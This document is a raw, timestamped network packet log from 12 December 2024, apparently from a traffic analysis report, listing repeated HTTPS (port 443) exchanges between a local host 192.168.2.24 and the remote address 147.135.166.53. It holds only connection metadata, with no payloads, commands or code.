                                                                                                          Dec 12, 2024 12:58:10.743644953 CET44349805147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:10.743935108 CET49805443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:10.743958950 CET44349805147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:10.745083094 CET44349805147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:10.745513916 CET49805443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:10.745652914 CET49805443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:10.745681047 CET44349805147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:10.789231062 CET49805443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:10.887927055 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:10.888272047 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:10.888288975 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:10.889714956 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:10.889791965 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:10.890135050 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:10.890202999 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:10.890398026 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:10.890407085 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:10.932368040 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:11.055262089 CET44349803147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.108733892 CET49803443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:11.135375977 CET44349803147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.135411978 CET44349803147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.135452032 CET49803443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:11.135461092 CET44349803147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.135483027 CET44349803147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.135494947 CET49803443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:11.135504007 CET44349803147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.135514021 CET49803443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:11.135535955 CET49803443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:11.135538101 CET44349803147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.135554075 CET49803443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:11.135586023 CET49803443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:11.242038965 CET44349806147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.242333889 CET49806443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:11.242367983 CET44349806147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.242845058 CET44349806147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.243175030 CET49806443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:11.243254900 CET44349806147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.243343115 CET49806443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:11.260421038 CET44349805147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.287353992 CET44349806147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.287906885 CET44349803147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.287940979 CET44349803147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.287991047 CET44349803147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.288033962 CET49803443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:11.288103104 CET44349803147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.288136959 CET49803443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:11.288161039 CET49803443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:11.298964977 CET44349805147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.298993111 CET44349805147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.299036026 CET44349805147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.299096107 CET49805443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:11.299124956 CET44349805147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.299139023 CET49805443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:11.299185991 CET49805443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:11.299222946 CET44349805147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.299279928 CET49805443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:11.299760103 CET49805443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:11.299772978 CET44349805147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.300017118 CET49811443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:11.300059080 CET44349811147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.300123930 CET49811443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:11.300765038 CET49811443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:11.300781965 CET44349811147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.369925976 CET44349803147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.369998932 CET44349803147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.370110989 CET49803443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:11.370178938 CET44349803147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.370218039 CET49803443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:11.370244026 CET49803443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:11.400438070 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.441231966 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:11.441258907 CET44349803147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.441353083 CET49803443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:11.441412926 CET44349803147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.441461086 CET44349803147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.441519976 CET49803443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:11.442087889 CET49803443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:11.442118883 CET44349803147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.442429066 CET49812443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:11.442456007 CET44349812147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.442519903 CET49812443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:11.443491936 CET49812443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:11.443507910 CET44349812147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.479984999 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.480001926 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.480101109 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:11.480117083 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.480128050 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.480190992 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:11.480204105 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.480253935 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.480290890 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:11.480314970 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:11.638676882 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.638689041 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.638752937 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.638787031 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:11.638801098 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.638825893 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:11.638844013 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:11.998819113 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.998836040 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.998905897 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:11.998920918 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.998969078 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:11.999139071 CET44349806147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.999239922 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.999259949 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.999309063 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:11.999309063 CET44349806147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.999325991 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.999366045 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:11.999393940 CET49806443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:11.999401093 CET44349806147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.999525070 CET44349806147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:11.999568939 CET49806443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.000163078 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.000183105 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.000215054 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.000220060 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.000246048 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.000260115 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.001681089 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.001698971 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.001739025 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.001744032 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.001780033 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.003654003 CET49806443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.003670931 CET44349806147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.003998041 CET49813443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.004026890 CET44349813147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.004085064 CET49813443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.004829884 CET49813443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.004848003 CET44349813147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.137164116 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.137197971 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.137244940 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.137258053 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.137293100 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.137311935 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.156759977 CET44349808147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.159049034 CET49808443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.159113884 CET44349808147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.160346031 CET44349808147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.160800934 CET49808443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.160944939 CET49808443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.160988092 CET44349808147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.162889004 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.162909985 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.162969112 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.162976980 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.163017988 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.185165882 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.185199022 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.185235023 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.185249090 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.185285091 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.185302019 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.202322006 CET49808443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.212769032 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.212796926 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.212847948 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.212857962 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.212888002 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.212899923 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.235764027 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.235797882 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.235846996 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.235877037 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.235894918 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.235915899 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.260972023 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.261007071 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.261044025 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.261068106 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.261084080 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.261109114 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.263334990 CET44349809147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.263597012 CET49809443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.263616085 CET44349809147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.264082909 CET44349809147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.264854908 CET49809443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.264934063 CET44349809147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.265203953 CET49809443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.284998894 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.285031080 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.285070896 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.285080910 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.285109997 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.285125017 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.307363987 CET44349809147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.310623884 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.310659885 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.310692072 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.310698032 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.310749054 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.332892895 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.332927942 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.332967043 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.332992077 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.333005905 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.333043098 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.349710941 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.349741936 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.349776983 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.349802017 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.349817038 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.349843979 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.368263006 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.368294954 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.368396044 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.368396044 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.368406057 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.368468046 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.378439903 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.378472090 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.378515005 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.378545046 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.378576994 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.378602982 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.387819052 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.387847900 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.387896061 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.387923956 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.387968063 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.387968063 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.395950079 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.395979881 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.396049976 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.396073103 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.396089077 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.396184921 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.405657053 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.405689955 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.405720949 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.405726910 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.405766964 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.414911985 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.414941072 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.414978981 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.414983988 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.415014982 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.415029049 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.421359062 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.421386957 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.421418905 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.421423912 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.421473980 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.429689884 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.429718971 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.429757118 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.429761887 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.429790974 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.429810047 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.438736916 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.438766956 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.438802958 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.438807964 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.438843966 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.438857079 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.447361946 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.447391033 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.447438955 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.447443962 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.447473049 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.447487116 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.456264019 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.456289053 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.456347942 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.456355095 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.456410885 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.456432104 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.464611053 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.464673042 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.464695930 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.464708090 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.464746952 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.464761972 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.482744932 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.482814074 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.482877016 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.482887983 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.482949018 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.482956886 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.483099937 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.483656883 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.483666897 CET44349804147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.483684063 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.483714104 CET49804443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.484105110 CET49814443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.484196901 CET44349814147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.485897064 CET49814443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.486257076 CET49814443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.486294031 CET44349814147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.669538021 CET44349808147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.712259054 CET49808443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.750658989 CET44349808147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.750690937 CET44349808147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.750778913 CET44349808147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.750809908 CET49808443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.750828028 CET44349808147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.750874043 CET44349808147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.750904083 CET44349808147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.750933886 CET49808443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.750933886 CET49808443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.750935078 CET49808443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.750972986 CET49808443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.775146961 CET44349809147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.808358908 CET44349809147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.808398962 CET44349809147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.808419943 CET49809443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.808445930 CET44349809147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.808475018 CET49809443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.808486938 CET44349809147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.808553934 CET49809443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.808918953 CET49809443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:12.808933973 CET44349809147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:12.809264898 CET49815443192.168.2.24147.135.166.53
